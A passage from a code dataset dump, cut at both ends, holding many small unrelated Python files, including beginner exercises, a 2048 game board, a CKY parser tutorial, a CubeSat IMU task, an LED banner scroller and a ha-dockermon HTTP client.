loader.get_template('theAlias/symbolResult.html')\n return HttpResponse(template.render(context,request))\n if count == 0:\n #check the symbolRedo\n redoCount = len(SymbolRedo.objects.filter(globalId=globalId))\n if redoCount == 1:\n context = {\n 'symbol': SymbolRedo.objects.filter(globalId=globalId)[0].symbol,\n 'status': 1,\n 'notes': [],\n }\n template = loader.get_template('theAlias/symbolResult.html')\n return HttpResponse(template.render(context,request))\n if redoCount == 0:\n context = {\n }\n template = loader.get_template('theAlias/symbol.html')\n resp = HttpResponse(template.render(context, request))\n 
resp.set_cookie('postToken',value='01')\n return resp\n\n##def applySymbol(request):\n## if request.COOKIES['postToken'] == '01':\n## template = loader.get_template(\"theAlias/symbolResult.html\")\n## globalId = request.session[\"globalId\"]\n##\n## symbol = request.POST[\"symbol\"]\n## redo = SymbolRedo(globalId=globalId, symbol=symbol, setup=datetime.now(), progress=1)\n## redo.save()\n## context = {\n## 'symbol': symbol,\n## 'status': 1,\n## 'notes': [],\n## }\n## resp = HttpResponse(template.render(context, request))\n## resp.set_cookie('postToken', value='00')\n## return resp\n## return HttpResponse(\"Can't Submit Twice\") \n","sub_path":"theAlias/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"324878350","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 17 20:24:37 2020\r\n\r\n@author: PC2\r\n\"\"\"\r\n\r\n#Entrada de datos\r\nKM=float(input('Dame el total de kilómetros por recorrer: '))\r\nTI=str(input('Dame el tipo de autobús, A, B o C: '))\r\nNPR=int(input('Dame el número de personas real: '))\r\n#Procesos\r\nif TI==\"A\":\r\n CK=2\r\nelse:\r\n if TI==\"B\":\r\n CK=2.50\r\n else:\r\n CK=3\r\n if NPR==20:\r\n NP=20\r\n else:\r\n NP=NPR\r\nTO=NPR*CK*KM\r\nCP=TO/NPR\r\n#Salida (Mostrar resultado(s))\r\nprint(f'La persona pagará: {CP}')\r\nprint(f\"El costo del viaje: {TO}\")\r\ninput('Presione enter para continjuar...')\r\n","sub_path":"C/Ejercicio 10.py","file_name":"Ejercicio 10.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"375206751","text":"while True:\n cont = 0\n num = int(input('Digite aqui um número: '))\n if num < 0:\n print('Programa encerrado!')\n break\n while cont <= 10:\n\n print(f'{num} x {cont} = {num * cont}')\n cont += 1","sub_path":"tabuada3.0.py","file_name":"tabuada3.0.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"141301901","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\nimport numpy as np\nimport pytest\n\nimport tvm\nfrom tvm import relay\nfrom tvm.relay import transform\n\ndef test_basic():\n mod = relay.Module()\n x2 = relay.var('x2', shape=(10, 5))\n y2 = relay.var('y2', shape=(1, 5))\n level2_func = relay.Function([x2, y2], relay.op.add(x2, y2))\n\n x1 = relay.var('x1', shape=(10, 5))\n y1 = relay.var('y1', shape=(1, 5))\n level1_func = relay.Function([x1, y1], level2_func(x1, y1))\n\n mod[\"main\"] = level1_func\n new_mod = transform.LambdaLift()(mod)\n assert len(new_mod.functions) == 2\n\nif __name__ == \"__main__\":\n pytest.main()\n\n","sub_path":"third_party/incubator-tvm/tests/python/relay/test_pass_lambda_lift.py","file_name":"test_pass_lambda_lift.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"602344627","text":"#使用递归方法来实现斐波那契数列\n\nprint(\"使用递归方法实现斐波那契数列\")\nnum=int(input(\"输出斐波那契数列的前多少项:\"))\n\ndef Fibonacci(n):\n if n<=1:\n return n\n else:\n return Fibonacci(n-1)+Fibonacci(n-2)\n\nprint(\"斐波那契数列如下:\")\n\nfor i in range(0,num):\n print(Fibonacci(i),end=\" \")","sub_path":"25_递归的斐波那契数列.py","file_name":"25_递归的斐波那契数列.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"77021706","text":"import numpy as np\nfrom enum import Enum\nfrom zope.event import notify\n\nclass GameStates(Enum):\n WIN = 1\n LOSE = 2\n IN_PROGRESS = 3\n\nclass GameActions(Enum):\n UP = 0\n DOWN = 1\n LEFT = 2\n RIGHT = 3\n\nclass OnBoardChanged():\n def __init__(self, board):\n self.board = board\n\nclass GameBoard():\n def __init__(self, n, max_tile=2048):\n self.n = n\n self.max_tile = max_tile\n self.board = np.zeros((n, n), dtype=np.int)\n self._game_state = GameStates.IN_PROGRESS\n self.action_set = set()\n\n self._free_tiles = n ** 2\n self._largest_tile_placed = 2\n self._score = 0\n center = (self.n - 1) / 2\n self.bonus_mask = np.array([(i - center) * (j - center) for i in range(self.n) for j in range(self.n)]).reshape(self.n, self.n)\n self.bonus_mask = np.abs(self.bonus_mask) / np.max(self.bonus_mask)\n\n self.add_tile(value=2)\n self.add_tile(value=2)\n self.on_board_updated()\n\n def __getitem__(self, item):\n return self.board[item]\n\n @property\n def game_state(self):\n return self._game_state\n\n @property\n def largest_tile_placed(self):\n return self._largest_tile_placed\n\n @property\n def actions(self):\n return self.action_set\n\n @property\n def score(self):\n #return self._score + self._free_tiles\n return self._score\n\n @property\n def free_tiles(self):\n return self._free_tiles\n\n def on_board_updated(self):\n self.update_action_set()\n self.calc_score()\n notify(OnBoardChanged(self))\n\n def update_action_set(self):\n \"\"\"\n Updates the set of available actions that can be taken on this board\n This function iterates over the matrix only once but checks both rows and columns\n for available actions simultaneously by interchanging the indices i,j (exploits the\n fact that the board is always square)\n \"\"\"\n self.action_set.clear()\n\n for i in range(self.n):\n h_zeroSeen, v_zeroSeen, v_digitSeen, h_digitSeen = False, False, False, False\n\n for j in range(self.n):\n if self.board[i][j] >= self.max_tile:\n self._game_state = GameStates.WIN\n self.action_set.clear()\n return\n\n # User can move tiles to the right if first a digit then a zero are seen when moving left-right in a row\n if self.board[i][j] == 0:\n h_zeroSeen = True\n if h_digitSeen: self.action_set.add(GameActions.RIGHT)\n\n # User can move tiles to the left if first a zero then a digit are seen when moving left-right in a row\n if self.board[i][j] != 0:\n h_digitSeen = True\n if h_zeroSeen: self.action_set.add(GameActions.LEFT)\n # If two adjacent horizontal tiles have the same value, either a left or right action can be performed\n if (j < self.n - 1 and self.board[i][j] == self.board[i][j+1]): self.action_set.update([GameActions.LEFT, GameActions.RIGHT])\n\n # User can move tiles down if first a digit then a zero are seen when moving top-bottom in a column\n if self.board[j][i] == 0:\n v_zeroSeen = True\n if v_digitSeen: self.action_set.add(GameActions.DOWN)\n\n # User can move tiles up if first a zero then a digit are seen when moving top-bottom in a column\n if self.board[j][i] != 0:\n v_digitSeen = True\n if v_zeroSeen: self.action_set.add(GameActions.UP)\n # If two adjacent vertical tiles have the same value, either an up or down action can be performed\n if (j < self.n - 1 and self.board[j][i] == self.board[j+1][i]): self.action_set.update([GameActions.UP, GameActions.DOWN])\n\n self._game_state = GameStates.LOSE if len(self.action_set) <= 0 else GameStates.IN_PROGRESS\n\n def add_tile(self, value=None):\n found = False\n while not found:\n i, j = np.random.randint(0, 
len(self.board), 2)\n found = (self.board[i][j] == 0)\n self.board[i][j] = value if isinstance(value, int) else np.random.randint(1, 3) * 2\n self._free_tiles -= 1\n\n def compress(self):\n change_flag = False\n for i in range(self.n):\n newindex = -1\n for j in range(self.n):\n if newindex == -1:\n if self.board[i][j] == 0: newindex = j\n continue\n if self.board[i][j] != 0:\n self.board[i][newindex] = self.board[i][j]\n self.board[i][j] = 0\n newindex = j\n change_flag = True\n return change_flag\n\n def merge(self):\n for i in range(self.n):\n for j in range(self.n - 1):\n if self.board[i][j] == 0 or self.board[i][j] != self.board[i][j + 1]: continue\n self.board[i][j] *= 2\n self.board[i][j + 1] = 0\n self._free_tiles += 1\n self._largest_tile_placed = max(self.board[i][j], self._largest_tile_placed)\n #self._score += self.board[i][j]\n #self._score += self.board[i][j] // 4\n #self._score += int(np.log2(self.board[i][j])) - 1\n\n def calc_score(self):\n self._score = int(np.sum(self.bonus_mask * self.board))\n\n\n def make_move(self, action):\n if not action in self.action_set: return\n {GameActions.UP: self.up, GameActions.DOWN: self.down, GameActions.LEFT: self.left, GameActions.RIGHT: self.right}[action]()\n self.add_tile()\n self.on_board_updated()\n #print('Score: {0}, Remaining tiles: {1}'.format(self.score, self._free_tiles))\n\n def up(self):\n self.board = np.rot90(self.board, axes=(0, 1))\n self.perform_action()\n self.board = np.rot90(self.board, axes=(1, 0))\n\n def down(self):\n self.board = np.rot90(self.board, axes=(1, 0))\n self.perform_action()\n self.board = np.rot90(self.board, axes=(0, 1))\n\n def left(self):\n self.perform_action()\n\n def right(self):\n self.board = np.flip(self.board, axis=1)\n self.perform_action()\n self.board = np.flip(self.board, axis=1)\n\n def perform_action(self):\n self.compress()\n self.merge()\n self.compress()\n","sub_path":"gameboard.py","file_name":"gameboard.py","file_ext":"py","file_size_in_byte":6521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"215241606","text":"bottle = [0, 0, 0, 0, 0]\r\nwater = [90, 80, 91, 99, 70]\r\n\r\nfor i in range(5):\r\n bottle[i] = int(input())\r\n\r\ntime = int(input())\r\n\r\nfor x in range(time):\r\n for y in range(5):\r\n if (bottle[y]+water[y]) > 2000:\r\n bottle[y] = water[y]\r\n else:\r\n bottle[y] = bottle[y] + water[y]\r\n\r\nmax_bottle = 0\r\nmax_quantity = 0\r\nfor i in range(5):\r\n if bottle[i] > max_quantity:\r\n max_quantity = bottle[i]\r\n max_bottle = i+1\r\n\r\nprint('%2d,%5d'%(max_bottle,max_quantity))","sub_path":"05_midterm/prob4.py","file_name":"prob4.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"374407139","text":"#Daily Coding Problem #1 [Easy]\n#Given a list of numbers and a number k, return whether any two numbers from the list add up to k\n#Ex. given [10,15,3,7] and k of 17, return true since 10+7 = 17\n#Bonus: Can you do this in one pass?\n\ndef check_sum(l,k):\n for i in range(len(l)):\n for j in range(i,len(l)):\n if(l[i]+l[j] == k):\n return True\n return False\n\nprint(check_sum([10,15,3,7],13))\n","sub_path":"day0001/dcp1_1.py","file_name":"dcp1_1.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"474731177","text":"r\"\"\"tutorial10.py\nCKY\n\n[Usage]\npython tutorial10.py main &> out\npython tutorial10.py main 2>&1 | pbcopy\n\"\"\"\nimport math\nimport os\nimport re\nimport sys\nfrom collections import defaultdict\nfrom itertools import islice\n\nfrom nltk.tree import Tree\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../\"))\nfrom kiyuna.utils.message import message, Renderer # noqa: E402 isort:skip\n\nINF = float(\"inf\")\nprog = re.compile(r\"[()]\")\n\n\ndef load_grammar(grammar_file):\n \"\"\" #10 p.65 \"\"\"\n nonterm = []\n preterm = defaultdict(list) # preterm[右] := [(左, 確率) ...]\n for rule in open(grammar_file):\n lhs, rhs, prob = rule.split(\"\\t\") # P(左 -> 右) = 確率\n rhs_symbols = rhs.split()\n prob = float(prob)\n if len(rhs_symbols) == 1: # 前終端記号\n preterm[rhs] += [(lhs, math.log(prob))]\n else: # 非終端記号\n nonterm += [(lhs, rhs_symbols[0], rhs_symbols[1], math.log(prob))]\n return nonterm, preterm\n\n\ndef cky(grammar_file, input_file, s=0, t=57):\n \"\"\" #10 pp.66-67 \"\"\"\n nonterm, preterm = load_grammar(grammar_file)\n for line in islice(open(input_file), s, t):\n words = line.split()\n # best_score[sym_{i, j}] := 最大対数確率\n best_score = defaultdict(lambda: -INF)\n # best_edge[sym_{i, j}] := (lsym_{i, k}, rsym_{k, j})\n best_edge = {}\n # 前終端記号を追加\n for i in range(len(words)):\n if preterm[words[i]]:\n for lhs, log_prob in preterm[words[i]]:\n best_score[f\"{lhs} ({i} {i+1})\"] = log_prob\n # 非終端記号の組み合わせ\n for j in range(2, len(words) + 1):\n for i in range(j - 2, -1, -1):\n for k in range(i + 1, j):\n # log(P(sym -> lsym rsym)) = log prob\n for sym, lsym, rsym, logprob in nonterm:\n par = f\"{sym} ({i} {j})\"\n left = f\"{lsym} ({i} {k})\"\n right = f\"{rsym} ({k} {j})\"\n # 両方の子供の確率が 0 より大きい\n if best_score[left] == -INF:\n continue\n if best_score[right] == -INF:\n continue\n # このノード・辺の対数確率を計算\n my_lp = best_score[left] + best_score[right] + logprob\n # この辺が確率最大のものなら更新\n if my_lp > best_score[par]:\n best_score[par] = my_lp\n best_edge[par] = (left, right)\n yield get_S_expr(f\"S (0 {len(words)})\", best_edge, words)\n\n\ndef get_S_expr(sym_ij, best_edge, words):\n \"\"\" #10 p.68 \"\"\"\n sym, i, _ = prog.sub(\"\", sym_ij).split()\n if sym_ij in best_edge:\n left = get_S_expr(best_edge[sym_ij][0], best_edge, words)\n right = get_S_expr(best_edge[sym_ij][1], best_edge, words)\n return f\"({sym} {left} {right})\"\n else:\n return f\"({sym} {words[int(i)]})\"\n\n\nif __name__ == \"__main__\":\n if sys.argv[1] == \"test\":\n grammar_file = \"../../test/08-grammar.txt\"\n input_file = \"../../test/08-input.txt\"\n else:\n grammar_file = \"../../data/wiki-en-test.grammar\"\n input_file = \"../../data/wiki-en-short.tok\"\n\n s, t = 0, 1\n with Renderer(sys.argv[1]) as out:\n for i, s_expr in enumerate(cky(grammar_file, input_file, s=s, t=t)):\n message(\"=\" * 3, \"line:\", s + i, \"=\" * 3)\n tree = Tree.fromstring(s_expr)\n out.result(\"S-expression\", s_expr)\n out.result(\"nltk.tree.Tree\", tree)\n out.header(\"nltk.tree.Tree.pretty_print\")\n tree.pretty_print()\n # tree.draw()\n\n\n\"\"\"result\n[+] main\n=== line: 0 ===\n[*] 1. S-expression\n(S (PP (IN Among) (NP (DT these) (NP' (, ,) (NP' (JJ supervised) (NP' (NN learning) (NNS approaches)))))) (S' (VP (VBP have) (VP (VBN been) (VP' (NP (DT the) (NP' (ADJP (RBS most) (JJ successful)) (NNS algorithms))) (PP (TO to) (NP_NN date))))) (. .)))\n[*] 2. 
nltk.tree.Tree\n(S\n (PP\n (IN Among)\n (NP\n (DT these)\n (NP'\n (, ,)\n (NP' (JJ supervised) (NP' (NN learning) (NNS approaches))))))\n (S'\n (VP\n (VBP have)\n (VP\n (VBN been)\n (VP'\n (NP\n (DT the)\n (NP' (ADJP (RBS most) (JJ successful)) (NNS algorithms)))\n (PP (TO to) (NP_NN date)))))\n (. .)))\n[*] 3. nltk.tree.Tree.pretty_print\n S\n _______________________________________________|_____________________\n | S'\n | _____________________|________________________________\n | VP |\n | ____|____ |\n PP | VP |\n __________|______ | ____|________________ |\n | NP | | VP' |\n | ___________|_______ | | _______|______________________ |\n | | NP' | | NP | |\n | | ______________|_____ | | ________|_______ | |\n | | | NP' | | | NP' | |\n | | | _____________|______ | | | _______|__________ | |\n | | | | NP' | | | ADJP | PP |\n | | | | ______|______ | | | ____|_______ | ___|____ |\n IN DT , JJ NN NNS VBP VBN DT RBS JJ NNS TO NP_NN .\n | | | | | | | | | | | | | | |\nAmong these , supervised learning approaches have been the most successful algorithms to date .\n\"\"\"\n","sub_path":"kiyuna/tutorial10/tutorial10.py","file_name":"tutorial10.py","file_ext":"py","file_size_in_byte":6691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"110785157","text":"# Task to obtain IMU sensor readings\n\nfrom Tasks.template_task import Task\n\nclass task(Task):\n priority = 5\n frequency = 1/10 # once every 10s\n name='imu'\n color = 'green'\n\n async def main_task(self):\n # take IMU readings\n readings = {\n 'accel':self.cubesat.acceleration,\n 'mag': self.cubesat.magnetic,\n 'gyro': self.cubesat.gyro,\n }\n\n # store them in our cubesat data_cache object\n self.cubesat.data_cache.update({'imu':readings})\n\n # print the readings with some fancy formatting\n self.debug('IMU readings (x,y,z)')\n for imu_type in self.cubesat.data_cache['imu']:\n self.debug('{:>5} {}'.format(imu_type,self.cubesat.data_cache['imu'][imu_type]),2)\n\n\n\n","sub_path":"basic/Tasks/imu_task.py","file_name":"imu_task.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"638515924","text":"from random import randint\n\n# Imports \nimport random\nimport math\nimport string\n\n#Define all functions to be used\ndef isprime(n):\n n = abs(int(n))\n if n < 2:\n return False\n if n == 2: \n return True \n if not 1 & n: \n return False\n for p in range(3, int(n**0.5) + 1, 2):\n if n % p == 0:\n return False\n return True\n\ndef vowel_count(string):\n count = 0\n for x in string:\n if x in ['a','e','i','o','u']:\n count=count+1\n return count\n\ndef sort_by_vowel_count(word):\n return word.sort(key=vowel_count,reverse=True)\n\n\n\nstudentNumber = input(\"Student Number: \")\nprint (\"\")\ntype(studentNumber)\nsNumber = [int(i) for i in str(studentNumber)]\nprint (\"Accepted the student number: \" + studentNumber)\nprint (\"\")\nsNumLen = len(sNumber)\n\nprint ()\np = 0\n\nfor i in range (0, sNumLen):\n \n if (isprime(sNumber[i])):\n p += 1\n \nif p == 0:\n print (\"Note: No Prime Numbers were found. Defaulting to 1 in order to allow division.\")\n p += 1\n print (\"1. The number of prime numbers in this student number is: \", p)\nelse:\n print (\"1. The number of prime numbers in this student number is: \", p)\nprint (\" \")\n\nq = 30\n\nprint (\"The Value of q before randomizing the number: \", q)\nprint (\" \")\nq = randint(24,51)\nprint (\"2. The Random number now is: \", q)\nprint (\" \")\n\n\nr = math.floor(q / p)\n\nprint (\"3. The number of strings to be generated is: \", r)\nprint (\" \")\n\nprint (\"4. List of Strings: \")\nprint (\"-----------------\")\n\n\narrWords = []\nboolSwitch = True\nfor i in range(0,r):\n if boolSwitch:\n arrWords.append(''.join(random.choices(string.ascii_lowercase, k=5)))\n boolSwitch = False\n else:\n arrWords.append(''.join(random.choices(string.ascii_lowercase, k=7)))\n boolSwitch = True\n\nfor i in range(0, r):\n print (i, \" - \",arrWords[i])\n\nprint (\"-----------------\") \n\nprint (\"\")\nprint (\"5. Sorted List:\")\nprint (\"-----------------\") \n\n\narrWords.sort(key = vowel_count, reverse = True)\nfor i in range(0, r):\n print (i, \" - \", arrWords[i], \"(Vowels:\", vowel_count(arrWords[i]),\")\")\nprint (\"-----------------\") \n\n\n\n\n\n\n\n\n\n\n","sub_path":"Python/Act10.py","file_name":"Act10.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"397837963","text":"#! /usr/bin/env python3\n\n#\n# Copyright (c) 2015 Bitlair\n#\n\n# Requires the Pillow library\n\nimport ledbanner\nimport sys\nimport time\nfrom PIL import Image\n\nif len(sys.argv) == 1:\n\tprint('Usage: %s [ ...]' % sys.argv[0])\n\texit(1)\n\ndef read_image(filename):\n\timg = Image.open(filename)\n\timg.thumbnail((led.size.x, float('inf')))\n\treturn img\n\nled = ledbanner.LEDBanner()\nimages = []\n\nfor f in sys.argv[1:]:\n\ttry:\n\t\timage = read_image(f)\n\t\timage_size = ledbanner.Vector(image.size[0], image.size[1])\n\t\traw = bytearray(image_size.x * image_size.y * led.bytes_per_pixel)\n\t\tfor x in range(0, image_size.x):\n\t\t\tfor y in range(0, image_size.y):\n\t\t\t\tpix = image.getpixel((x, y))\n\t\t\t\tif type(pix) is int: # Monochrome\n\t\t\t\t\tpix = (pix, pix, pix)\n\t\t\t\ti = (y * led.size.x + x) * led.bytes_per_pixel\n\t\t\t\traw[i:i+3] = pix\n\t\timages.append((raw, image_size))\n\texcept:\n\t\tpass\nif len(images) == 0:\n\tprint('Unable to read any of the specified images')\n\texit(1)\n\nwhile 1:\n\tfor image, image_size in images:\n\t\tfor scroll in range(led.size.y, -image_size.y, -1):\n\t\t\tframe = led.make_frame()\n\n\t\t\tframe_start_y = scroll\n\t\t\tif frame_start_y < 0:\n\t\t\t\tframe_start_y = 0\n\t\t\tframe_stop_y = scroll + image_size.y\n\t\t\tif frame_stop_y > led.size.y:\n\t\t\t\tframe_stop_y = led.size.y\n\t\t\timage_start_y = -scroll\n\t\t\tif image_start_y < 0:\n\t\t\t\timage_start_y = 0\n\t\t\timage_stop_y = image_start_y + frame_stop_y - frame_start_y\n\t\t\tif image_stop_y > image_size.y:\n\t\t\t\timage_stop_y = image_size.y\n\n\t\t\tbytes_per_y = led.size.x * led.bytes_per_pixel\n\t\t\tframe[frame_start_y * bytes_per_y:frame_stop_y * bytes_per_y] = \\\n\t\t\t\timage[image_start_y*bytes_per_y:image_stop_y*bytes_per_y]\n\n\t\t\tled.set_frame(frame)\n\t\t\ttime.sleep(1 / led.fps)\n","sub_path":"programs/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"216976424","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Song of Pi\n# https://www.hackerrank.com/challenges/song-of-pi\n\nt = int(input())\np = '31415926535897932384626433833'\nfor i in range(t):\n s = input().split()\n song = True\n for j in range(len(s)):\n if len(s[j]) != int(p[j]):\n song = False\n if song == True:\n print('It\\'s a pi song.')\n else:\n print('It\\'s not a pi song.')\n","sub_path":"songofpi.py","file_name":"songofpi.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"62642362","text":"\"\"\"\nA python module to interact with ha-dockermon.\nThis code is released under the terms of the MIT license. See the LICENSE\nfile for more details.\n\"\"\"\nimport requests\n\nclass Dockermon:\n \"\"\"This class is used to interact with ha-dockermon.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize\"\"\"\n\n def listContainers(self, host, port='8126'):\n \"\"\"Get a list of all containers not in exclude list.\"\"\"\n BASE = 'http://' + host + ':' + port\n fetchUrl = BASE + '/containers'\n try:\n containers = requests.get(fetchUrl)\n except:\n return False\n else:\n if containers:\n return containers.json()\n else:\n return False\n\n def getContainerState(self, container, host, port='8126'):\n \"\"\"Get the state of a container.\"\"\"\n BASE = 'http://' + host + ':' + port\n fetchUrl = BASE + '/container/' + container\n try:\n containerState = requests.get(fetchUrl)\n except:\n return False\n else:\n if containerState:\n return containerState.json()\n else:\n return False\n\n def getContainerStats(self, container, host, port='8126'):\n \"\"\"Get the state of a container.\"\"\"\n BASE = 'http://' + host + ':' + port\n fetchUrl = BASE + '/container/' + container + '/stats'\n try:\n containerStats = requests.get(fetchUrl)\n except:\n return False\n else:\n if containerStats:\n return containerStats.json()\n else:\n return False\n\n def startContainer(self, container, host, port='8126'):\n \"\"\"Start a spesified container\"\"\"\n BASE = 'http://' + host + ':' + port\n commandUrl = BASE + '/container/' + container + '/start'\n try:\n runCommand = requests.get(commandUrl)\n except:\n return False\n else:\n if runCommand:\n return True\n else:\n return False\n\n def stopContainer(self, container, host, port='8126'):\n \"\"\"Start a spesified container\"\"\"\n BASE = 'http://' + host + ':' + port\n commandUrl = BASE + '/container/' + container + '/stop'\n try:\n runCommand = requests.get(commandUrl)\n except:\n return False\n else:\n if runCommand:\n return True\n else:\n return False","sub_path":"pydockermon/pydockermon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"583079512","text":"lst=list(map(int, input().split()))\nwhile len(lst)==2:\n n, m=lst\n info=[[0]*(n+1) for i in range(n+1)]\n for i in range(1, n+1):\n info[i][i]=1\n for i in range(m):\n a, b, p=map(int, input().split())\n info[a][b]=p/100\n info[b][a]=p/100\n for k in range(1, n+1):\n for i in range(1, n+1):\n for j in range(1, n+1):\n info[i][j]=max(info[i][j], info[i][k]*info[k][j])\n print(\"%.6f percent\"%(info[1][n]*100))\n lst=list(map(int, input().split()))\n","sub_path":"BOJ/6528.py","file_name":"6528.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"39577948","text":"# -*- coding:utf-8 -*-\n# author : alexloser\n# note : python3.4+\n\"\"\" The basic part of bace3 module \"\"\"\nimport sys, os, _io\nimport gc, inspect, traceback\nimport functools\nimport base64, json\nfrom _io import DEFAULT_BUFFER_SIZE, BytesIO\nfrom pathlib import Path\nfrom platform import platform\nfrom urllib.parse import unquote_plus\nfrom time import time, strftime, localtime, sleep\nfrom datetime import datetime, date\ntry:\n from _hashlib import openssl_md5 as _md5hash\nexcept ImportError:\n from hashlib import md5 as _md5hash\n\n# Define current python version, should be (3. x)\nPythonVersion = (sys.version_info.major, sys.version_info.minor)\n# The number of logical cores in cpu, return None if indeterminable\nNCPU = os.cpu_count()\n\n# Recursive function calling stack limits\nDEFAULT_RECURSION_LIMIT = 1000\nBIGGER_RECURSION_LIMIT = 4096\n\n# PVM checking time interval\nDEFAULT_CHECK_INTERVAL = 100\nLONGER_CHECK_INTERVAL = 1024\n\n# PVM GC threshold\nDEFAULT_GC_THRESHOLD = (700, 10, 10)\nLOWER_GC_THRESHOLD = (512, 8, 4)\nHIGHER_GC_THRESHOLD = (1024, 32, 16)\n\n# Bytes constants\nKB = 1024\nMB = 1024 << 10\nGB = 1024 << 20\n\n# IO buffer size\nBEST_IO_BUFFER_SIZE = 2*DEFAULT_BUFFER_SIZE\n\n# Max file size can be read into memory\nMAX_FILE_SIZE_32BIT = 2*GB\n\n# For indexing readable weekday strings\nWEEKDAYS0_EN = (None, 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday')\nWEEKDAYS_EN = ('Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday')\nWEEKDAYS_ZHCN = ('星期一', '星期二', '星期三', '星期四', '星期五', '星期六', '星期日')\n\ndef reconfig():\n \"\"\" Set global PVM configs \"\"\"\n cfg = {}\n cfg['sys.platform'] = sys.platform\n cfg['sys.maxsize'] = sys.maxsize\n cfg['sys.path'] = sys.path\n cfg['sys.excepthook'] = sys.excepthook\n cfg['old sys.switchinterval'] = sys.getswitchinterval()\n sys.setswitchinterval(LONGER_CHECK_INTERVAL)\n cfg['new sys.switchinterval'] = sys.getswitchinterval()\n cfg['old sys.recursionlimit'] = sys.getrecursionlimit()\n sys.setrecursionlimit(BIGGER_RECURSION_LIMIT)\n cfg['new sys.recursionlimit'] = sys.getrecursionlimit()\n cfg['old gc.threshold'] = str(gc.get_threshold())\n gc.set_threshold(*LOWER_GC_THRESHOLD)\n cfg['new gc.threshold'] = str(gc.get_threshold())\n sys._clear_type_cache()\n cfg['sys._clear_type_cache'] = True\n return cfg\n\n\ndef get_caller(depth=1) -> str:\n \"\"\" Get caller of current frame \"\"\"\n cf = inspect.currentframe()\n for _ in range(depth + 1):\n cf = cf.f_back\n try:\n return '[%s] ' % inspect.getframeinfo(cf).function\n except AttributeError:\n return '[%s] ' % inspect.getframeinfo(inspect.currentframe()).function\n\n\ndef is_iterable(obj):\n \"\"\" Check for the `__iter__` attribute so that this can cover types that \n don't have to be known by this module, such as NumPy arrays. 
\"\"\"\n return hasattr(obj, '__iter__') and not isinstance(obj, str)\n\n\ndef to_bytes(obj:object) -> bytes:\n \"\"\" Get bytes of object if supported, \n using 'ascii' or 'utf-8' as defualt string encode \n \"\"\"\n if isinstance(obj, str):\n try:\n return bytes(obj, 'ascii')\n except UnicodeEncodeError:\n return bytes(obj, 'utf-8')\n elif isinstance(obj, (bytes, bytearray)):\n return obj\n return memoryview(obj).tobytes()\n\n\ndef utf8(s, errors='replace') -> str:\n \"\"\" Transform str to 'utf-8' coding \"\"\"\n return str(s, 'utf-8', errors=errors)\n\n\ndef debug(*args, **kwargs):\n \"\"\" Print to stderr not stdout \"\"\"\n ts = time()\n dt = strftime('%F %T') + ('.%03d' % ((ts - int(ts)) * 1000))\n print(dt, *args, file=sys.stderr, flush=True, **kwargs)\n\ndef print_error(name, output=sys.stderr):\n \"\"\" Print exception with extra info(name) and limit traceback in 2 \"\"\"\n assert name\n assert output is sys.stderr or output is sys.stdout\n exc_type, exc_val, exc_tb = sys.exc_info()\n exc_type = str(exc_type).lstrip('class <').rstrip('>')\n sys.stderr.write('%s : %s from :%s\\n' % (exc_type, exc_val, name))\n traceback.print_tb(exc_tb, limit=2, file=output)\n\ndef fmterr(depth=2):\n \"\"\" Print exception with extra info(name) and limit traceback in 2 \"\"\"\n _, _, exc_tb = sys.exc_info()\n return ''.join(traceback.format_tb(exc_tb, limit=depth)).replace('\\n', '').strip()\n\ndef class_name(name):\n \"\"\" return object's class name \"\"\"\n return str(name).split('.')[-1][:-2]\n\ndef md5(buf:bytes) -> str:\n \"\"\" Get md5 hexdigest of bytes \"\"\"\n return 